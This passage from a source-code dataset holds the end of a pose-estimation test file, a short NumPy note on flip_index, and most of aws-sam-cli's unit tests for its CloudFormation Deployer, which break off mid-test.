tags_list=[], heatmaps=fake_heatmaps,
tags=fake_tags, test_scale_factor=[1, 2],
project2image=False, flip_test=True)
assert aggregated_heatmaps.shape == torch.Size((1, 2, 4, 4))
def test_get_group_preds():
fake_grouped_joints = [np.array([[[0, 0], [1, 1]]])]
results = get_group_preds(
fake_grouped_joints,
center=np.array([0, 0]),
scale=np.array([1, 1]),
heatmap_size=np.array([2, 2]))
    assert results != []
results = get_group_preds(
fake_grouped_joints,
center=np.array([0, 0]),
scale=np.array([1, 1]),
heatmap_size=np.array([2, 2]),
use_udp=True)
    assert results != []
| 48.067669 | 77 | 0.558267 | 719 | 6,393 | 4.685675 | 0.090403 | 0.081923 | 0.042446 | 0.065301 | 0.883942 | 0.872663 | 0.856931 | 0.833779 | 0.777976 | 0.721282 | 0 | 0.028699 | 0.335054 | 6,393 | 132 | 78 | 48.431818 | 0.76382 | 0.007977 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.025 | false | 0 | 0.033333 | 0 | 0.058333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
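flip_index in the tests above records which joint channels trade places when a pose heatmap is mirrored (e.g. left and right shoulders). The core operation is a channel re-index combined with a horizontal flip; a minimal NumPy sketch with two mirror-paired joints:

import numpy as np

heatmaps = np.arange(16, dtype=float).reshape(1, 2, 2, 4)  # (batch, joints, height, width)
flip_index = [1, 0]  # joint 0 and joint 1 are mirror counterparts
flipped = heatmaps[:, flip_index, :, ::-1]  # swap joint channels, reverse the width axis
print(flipped.shape)  # (1, 2, 2, 4)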
4c2f2e2b3194d27eaacddc6d0e67d055c9efa53a | 57,114 | py | Python | tests/unit/lib/deploy/test_deployer.py | praneetap/aws-sam-cli | 2a713566c8de72a68eb8954584674a61a2d807ac | [
"Apache-2.0"
] | 2,285 | 2017-08-11T16:57:31.000Z | 2018-05-08T20:38:25.000Z | tests/unit/lib/deploy/test_deployer.py | praneetap/aws-sam-cli | 2a713566c8de72a68eb8954584674a61a2d807ac | [
"Apache-2.0"
] | 314 | 2017-08-11T17:29:27.000Z | 2018-05-08T20:51:47.000Z | tests/unit/lib/deploy/test_deployer.py | praneetap/aws-sam-cli | 2a713566c8de72a68eb8954584674a61a2d807ac | [
"Apache-2.0"
] | 284 | 2017-08-11T17:35:48.000Z | 2018-05-08T20:15:59.000Z | from logging import captureWarnings
from operator import inv
from typing import Container, Iterable, Union
import uuid
import time
import math
from datetime import datetime, timedelta, timezone
from unittest import TestCase
from unittest.mock import patch, MagicMock, ANY, call
from botocore.exceptions import ClientError, WaiterError, BotoCoreError
from samcli.commands.deploy.exceptions import (
DeployFailedError,
ChangeSetError,
DeployStackOutPutFailedError,
DeployBucketInDifferentRegionError,
)
from samcli.lib.deploy.deployer import Deployer
from samcli.lib.package.s3_uploader import S3Uploader
from samcli.lib.utils.time import utc_to_timestamp, to_datetime
class MockPaginator:
    """Minimal stand-in for a botocore paginator that returns canned pages."""

    def __init__(self, resp):
        self.resp = resp

    def paginate(self, ChangeSetName=None, StackName=None):
        return self.resp


class MockChangesetWaiter:
    """Mock change-set waiter; wait() raises the given exception, if any."""

    def __init__(self, ex=None):
        self.ex = ex

    def wait(self, ChangeSetName, StackName, WaiterConfig):
        if self.ex:
            raise self.ex
        return


class MockCreateUpdateWaiter:
    """Mock stack create/update waiter; wait() raises the given exception, if any."""

    def __init__(self, ex=None):
        self.ex = ex

    def wait(self, StackName, WaiterConfig):
        if self.ex:
            raise self.ex
        return
class CustomTestCase(TestCase):
def assertListSubset(self, l1: Iterable, l2: Union[Iterable, Container], msg=None) -> None:
"""
Assert l2 contains all items in l1.
Just like calling self.assertIn(l1[x], l2) in a loop.
"""
for x in l1:
self.assertIn(x, l2, msg)
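# Illustrative usage of assertListSubset (hypothetical values):
#   self.assertListSubset([1, 2], [1, 2, 3])   # passes
#   self.assertListSubset([1, 4], [1, 2, 3])   # fails when it reaches 4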
class TestDeployer(CustomTestCase):
def setUp(self):
self.session = MagicMock()
self.cloudformation_client = self.session.client("cloudformation")
self.s3_client = self.session.client("s3")
self.deployer = Deployer(self.cloudformation_client)
def test_deployer_init(self):
self.assertEqual(self.deployer._client, self.cloudformation_client)
self.assertEqual(self.deployer.changeset_prefix, "samcli-deploy")
def test_deployer_init_custom_sleep(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep=10)
self.assertEqual(deployer.client_sleep, 10)
def test_deployer_init_custom_sleep_invalid(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep="INVALID")
self.assertEqual(deployer.client_sleep, 0.5) # 0.5 is the default value
def test_deployer_init_custom_sleep_negative(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep=-5)
self.assertEqual(deployer.client_sleep, 0.5) # 0.5 is the default value
def test_deployer_init_custom_sleep_zero(self):
deployer = Deployer(MagicMock().client("cloudformation"), client_sleep=0)
self.assertEqual(deployer.client_sleep, 0.5) # 0.5 is the default value
def test_deployer_init_default_sleep(self):
deployer = Deployer(MagicMock().client("cloudformation"))
self.assertEqual(deployer.client_sleep, 0.5)
def test_deployer_has_no_stack(self):
self.deployer._client.describe_stacks = MagicMock(return_value={"Stacks": []})
self.assertEqual(self.deployer.has_stack("test"), False)
def test_deployer_has_stack_in_review(self):
self.deployer._client.describe_stacks = MagicMock(
return_value={"Stacks": [{"StackStatus": "REVIEW_IN_PROGRESS"}]}
)
self.assertEqual(self.deployer.has_stack("test"), False)
def test_deployer_has_stack_exception_non_exsistent(self):
self.deployer._client.describe_stacks = MagicMock(
side_effect=ClientError(
error_response={"Error": {"Message": "Stack with id test does not exist"}},
operation_name="stack_status",
)
)
self.assertEqual(self.deployer.has_stack("test"), False)
def test_deployer_has_stack_exception(self):
self.deployer._client.describe_stacks = MagicMock(side_effect=Exception())
with self.assertRaises(Exception):
self.deployer.has_stack("test")
def test_deployer_has_stack_exception_botocore(self):
self.deployer._client.describe_stacks = MagicMock(side_effect=BotoCoreError())
with self.assertRaises(DeployFailedError):
self.deployer.has_stack("test")
def test_create_changeset(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.create_change_set.call_count, 1)
self.deployer._client.create_change_set.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
ChangeSetName=ANY,
ChangeSetType="CREATE",
Description=ANY,
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_update_changeset(self):
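        # With an existing stack, create_changeset is expected to request an UPDATE changeset.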
self.deployer.has_stack = MagicMock(return_value=True)
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.assertEqual(self.deployer._client.create_change_set.call_count, 1)
self.deployer._client.create_change_set.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
ChangeSetName=ANY,
ChangeSetType="UPDATE",
Description=ANY,
NotificationARNs=[],
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
RoleARN="role-arn",
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_create_changeset_exception(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer._client.create_change_set = MagicMock(side_effect=Exception)
with self.assertRaises(ChangeSetError):
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_create_changeset_ClientErrorException(self):
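        # An S3 "wrong endpoint" validation error should surface as
        # DeployBucketInDifferentRegionError rather than a generic ChangeSetError.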
error_message = (
"An error occurred (ValidationError) when calling the CreateChangeSet "
"operation: S3 error: The bucket you are attempting to access must be "
"addressed using the specified endpoint. "
"Please send all future requests to this "
"endpoint.\nFor more information "
"check http://docs.aws.amazon.com/AmazonS3/latest/API/ErrorResponses.html"
)
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer._client.create_change_set = MagicMock(
side_effect=ClientError(
error_response={"Error": {"Message": error_message}}, operation_name="create_changeset"
)
)
with self.assertRaises(DeployBucketInDifferentRegionError):
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_create_changeset_ClientErrorException_generic(self):
self.deployer.has_stack = MagicMock(return_value=False)
self.deployer._client.create_change_set = MagicMock(
side_effect=ClientError(error_response={"Error": {"Message": "Message"}}, operation_name="create_changeset")
)
with self.assertRaises(ChangeSetError):
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
def test_create_changeset_pass_through_optional_arguments_only_if_having_values(self):
self.deployer.has_stack = MagicMock(return_value=False)
        # assert that the optional arguments Capabilities, RoleARN and NotificationARNs are passed through when they have values
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=["CAPABILITY_IAM"],
role_arn="role-arn",
notification_arns=[],
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.deployer._client.create_change_set.assert_called_with(
Capabilities=["CAPABILITY_IAM"],
RoleARN="role-arn",
NotificationARNs=[],
ChangeSetName=ANY,
ChangeSetType="CREATE",
Description=ANY,
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
        # assert that the optional arguments Capabilities, RoleARN and NotificationARNs are omitted when they have no values
self.deployer.create_changeset(
stack_name="test",
cfn_template=" ",
parameter_values=[
{"ParameterKey": "a", "ParameterValue": "b"},
{"ParameterKey": "c", "UsePreviousValue": True},
],
capabilities=None,
role_arn=None,
notification_arns=None,
s3_uploader=S3Uploader(s3_client=self.s3_client, bucket_name="test_bucket"),
tags={"unit": "true"},
)
self.deployer._client.create_change_set.assert_called_with(
ChangeSetName=ANY,
ChangeSetType="CREATE",
Description=ANY,
Parameters=[{"ParameterKey": "a", "ParameterValue": "b"}],
StackName="test",
Tags={"unit": "true"},
TemplateURL=ANY,
)
def test_describe_changeset_with_changes(self):
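        # Three pages with one "Add" change each; describe_changeset should
        # aggregate them into a single dict keyed by action.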
response = [
{
"Changes": [
{"ResourceChange": {"LogicalResourceId": "resource_id1", "ResourceType": "s3", "Action": "Add"}}
]
},
{
"Changes": [
{"ResourceChange": {"LogicalResourceId": "resource_id2", "ResourceType": "kms", "Action": "Add"}}
]
},
{
"Changes": [
{"ResourceChange": {"LogicalResourceId": "resource_id3", "ResourceType": "lambda", "Action": "Add"}}
]
},
]
self.deployer._client.get_paginator = MagicMock(return_value=MockPaginator(resp=response))
changes = self.deployer.describe_changeset("change_id", "test")
self.assertEqual(
changes,
{
"Add": [
{"LogicalResourceId": "resource_id1", "ResourceType": "s3", "Replacement": "N/A"},
{"LogicalResourceId": "resource_id2", "ResourceType": "kms", "Replacement": "N/A"},
{"LogicalResourceId": "resource_id3", "ResourceType": "lambda", "Replacement": "N/A"},
],
"Modify": [],
"Remove": [],
},
)
def test_describe_changeset_with_no_changes(self):
response = [{"Changes": []}]
self.deployer._client.get_paginator = MagicMock(return_value=MockPaginator(resp=response))
changes = self.deployer.describe_changeset("change_id", "test")
self.assertEqual(changes, {"Add": [], "Modify": [], "Remove": []})
def test_wait_for_changeset(self):
self.deployer._client.get_waiter = MagicMock(return_value=MockChangesetWaiter())
self.deployer.wait_for_changeset("test-id", "test-stack")
def test_wait_for_changeset_exception_ChangeEmpty(self):
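        # A WaiterError from the changeset waiter should surface as a ChangeSetError.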
self.deployer._client.get_waiter = MagicMock(
return_value=MockChangesetWaiter(
ex=WaiterError(
name="wait_for_changeset",
reason="unit-test",
last_response={"Status": "Failed", "StatusReason": "It's a unit test"},
)
)
)
with self.assertRaises(ChangeSetError):
self.deployer.wait_for_changeset("test-id", "test-stack")
def test_execute_changeset(self):
self.deployer.execute_changeset("id", "test", True)
self.deployer._client.execute_change_set.assert_called_with(
ChangeSetName="id", StackName="test", DisableRollback=True
)
def test_execute_changeset_exception(self):
self.deployer._client.execute_change_set = MagicMock(
side_effect=ClientError(error_response={"Error": {"Message": "Error"}}, operation_name="execute_changeset")
)
with self.assertRaises(DeployFailedError):
self.deployer.execute_changeset("id", "test", True)
def test_get_last_event_time(self):
timestamp = datetime.utcnow()
self.deployer._client.describe_stack_events = MagicMock(
return_value={"StackEvents": [{"Timestamp": timestamp}]}
)
self.assertEqual(self.deployer.get_last_event_time("test"), utc_to_timestamp(timestamp))
def test_get_last_event_time_unknown_last_time(self):
current_timestamp = datetime.utcnow()
self.deployer._client.describe_stack_events = MagicMock(side_effect=KeyError)
        # Convert the returned seconds to milliseconds
last_stack_event_timestamp = to_datetime(self.deployer.get_last_event_time("test") * 1000)
self.assertEqual(last_stack_event_timestamp.year, current_timestamp.year)
self.assertEqual(last_stack_event_timestamp.month, current_timestamp.month)
self.assertEqual(last_stack_event_timestamp.day, current_timestamp.day)
self.assertEqual(last_stack_event_timestamp.hour, current_timestamp.hour)
self.assertEqual(last_stack_event_timestamp.minute, current_timestamp.minute)
self.assertEqual(last_stack_event_timestamp.second, current_timestamp.second)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_chronological_order(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
return_value=MockPaginator(
# describe_stack_events is in reverse chronological order
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=3),
"ResourceStatus": "CREATE_COMPLETE",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=2),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=1),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
)
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
self.assertEqual(patched_pprint_columns.call_count, 5)
self.assertListSubset(
["CREATE_IN_PROGRESS", "s3", "mybucket"], patched_pprint_columns.call_args_list[0][1]["columns"]
)
self.assertListSubset(
["CREATE_IN_PROGRESS", "kms", "mykms"], patched_pprint_columns.call_args_list[1][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "s3", "mybucket"], patched_pprint_columns.call_args_list[2][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "kms", "mykms"], patched_pprint_columns.call_args_list[3][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[4][1]["columns"],
)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_chronological_order_with_previous_event(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
last_event_timestamp = start_timestamp - timedelta(hours=6)
self.deployer._client.get_paginator = MagicMock(
return_value=MockPaginator(
# describe_stack_events is in reverse chronological order
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=3),
"ResourceStatus": "UPDATE_COMPLETE",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=2),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=1),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
                    # Last event (from a previous deployment)
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": last_event_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
}
]
},
]
)
)
self.deployer.describe_stack_events("test", utc_to_timestamp(last_event_timestamp))
self.assertEqual(patched_pprint_columns.call_count, 5)
self.assertListSubset(
["UPDATE_IN_PROGRESS", "s3", "mybucket"], patched_pprint_columns.call_args_list[0][1]["columns"]
)
self.assertListSubset(
["UPDATE_IN_PROGRESS", "kms", "mykms"], patched_pprint_columns.call_args_list[1][1]["columns"]
)
self.assertListSubset(
["UPDATE_COMPLETE", "s3", "mybucket"], patched_pprint_columns.call_args_list[2][1]["columns"]
)
self.assertListSubset(
["UPDATE_COMPLETE", "kms", "mykms"], patched_pprint_columns.call_args_list[3][1]["columns"]
)
self.assertListSubset(
["UPDATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[4][1]["columns"],
)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_skip_old_event(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
last_event_timestamp = start_timestamp - timedelta(hours=6)
sample_events = [
# old deployment
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": last_event_timestamp - timedelta(seconds=10),
"ResourceStatus": "CREATE_IN_PROGRESS",
}
]
},
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": last_event_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
}
]
},
# new deployment
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp,
"ResourceStatus": "UPDATE_IN_PROGRESS",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=10),
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=20),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=30),
"ResourceStatus": "UPDATE_COMPLETE",
}
]
},
]
invalid_event = {"StackEvents": [{}]} # if deployer() loop read this, KeyError would raise
self.deployer._client.get_paginator = MagicMock(
side_effect=[
MockPaginator([sample_events[0], invalid_event]),
MockPaginator([sample_events[1], sample_events[0], invalid_event]),
MockPaginator([sample_events[2], sample_events[1], invalid_event]),
MockPaginator([sample_events[3], sample_events[2], invalid_event]),
MockPaginator([sample_events[4], sample_events[3], invalid_event]),
MockPaginator([sample_events[5], sample_events[4], invalid_event]),
]
)
self.deployer.describe_stack_events("test", utc_to_timestamp(last_event_timestamp))
self.assertEqual(patched_pprint_columns.call_count, 4)
self.assertListSubset(
["UPDATE_IN_PROGRESS", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[0][1]["columns"],
)
self.assertListSubset(
["UPDATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[3][1]["columns"],
)
@patch("time.sleep")
@patch("samcli.lib.deploy.deployer.pprint_columns")
def test_describe_stack_events_stop_at_first_not_in_progress(self, patched_pprint_columns, patched_time):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
return_value=MockPaginator(
# describe_stack_events is in reverse chronological order
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=33),
"ResourceStatus": "UPDATE_COMLPETE",
},
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=32),
"ResourceStatus": "UPDATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
},
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=31),
"ResourceStatus": "UPDATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
},
]
},
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=30),
"ResourceStatus": "UPDATE_IN_PROGRESS",
},
{
                                # This event should stop the loop, so the newer events above are ignored
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp + timedelta(seconds=3),
"ResourceStatus": "CREATE_COMPLETE",
},
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp + timedelta(seconds=1),
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
)
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
self.assertEqual(patched_pprint_columns.call_count, 3)
self.assertListSubset(
["CREATE_IN_PROGRESS", "s3", "mybucket"], patched_pprint_columns.call_args_list[0][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "s3", "mybucket"], patched_pprint_columns.call_args_list[1][1]["columns"]
)
self.assertListSubset(
["CREATE_COMPLETE", "AWS::CloudFormation::Stack", "test"],
patched_pprint_columns.call_args_list[2][1]["columns"],
)
@patch("samcli.lib.deploy.deployer.math")
@patch("time.sleep")
def test_describe_stack_events_exceptions(self, patched_time, patched_math):
self.deployer._client.get_paginator = MagicMock(
side_effect=[
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
]
)
        # No exception is raised; we return with a log message instead, because
        # the changeset is still executing even though displaying its events is throttled.
self.deployer.describe_stack_events("test", time.time())
self.assertEqual(patched_math.pow.call_count, 3)
self.assertEqual(patched_math.pow.call_args_list, [call(2, 1), call(2, 2), call(2, 3)])
@patch("samcli.lib.deploy.deployer.math")
@patch("time.sleep")
def test_describe_stack_events_resume_after_exceptions(self, patched_time, patched_math):
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
side_effect=[
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
ClientError(
error_response={"Error": {"Message": "Rate Exceeded"}}, operation_name="describe_stack_events"
),
MockPaginator(
[
{
"StackEvents": [
{
"StackId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"EventId": str(uuid.uuid4()),
"StackName": "test",
"LogicalResourceId": "test",
"PhysicalResourceId": "arn:aws:cloudformation:region:accountId:stack/test/uuid",
"ResourceType": "AWS::CloudFormation::Stack",
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
},
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
},
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_COMPLETE",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "kms",
"LogicalResourceId": "mykms",
}
]
},
{
"StackEvents": [
{
"EventId": str(uuid.uuid4()),
"Timestamp": start_timestamp,
"ResourceStatus": "CREATE_IN_PROGRESS",
"ResourceType": "s3",
"LogicalResourceId": "mybucket",
}
]
},
]
),
]
)
self.deployer.describe_stack_events("test", utc_to_timestamp(start_timestamp) - 1)
self.assertEqual(patched_math.pow.call_count, 3)
self.assertEqual(patched_math.pow.call_args_list, [call(2, 1), call(2, 2), call(2, 3)])
@patch("samcli.lib.deploy.deployer.math.pow", wraps=math.pow)
@patch("time.sleep")
def test_describe_stack_events_reset_retry_on_success_after_exceptions(self, patched_time, patched_pow):
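        # After a successful poll the retry counter should reset, so the backoff
        # exponent starts again at 1 (see the final call(2, 1) below).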
start_timestamp = datetime(2022, 1, 1, 16, 42, 0, 0, timezone.utc)
self.deployer._client.get_paginator = MagicMock(
side_effect=[
MockPaginator(
[
{
"StackEvents": [
{
